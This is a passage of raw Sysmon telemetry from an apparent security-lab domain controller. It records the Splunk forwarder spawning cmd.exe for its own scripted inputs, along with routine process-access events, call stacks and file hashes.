Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0F-5F80-6500-000000007F01}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002217Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0F-5F80-6500-000000007F01}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002216Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.244{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0F-5F80-6500-000000007F01}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002215Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.247{733EE690-3E0F-5F80-6500-000000007F01}3956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002214Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0F-5F80-6400-000000007F01}3936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002213Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002212Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002211Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002210Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002209Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002208Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002207Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002206Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002205Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002204Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0F-5F80-6400-000000007F01}3936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002203Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.135{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0F-5F80-6400-000000007F01}3936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002202Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.137{733EE690-3E0F-5F80-6400-000000007F01}3936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT 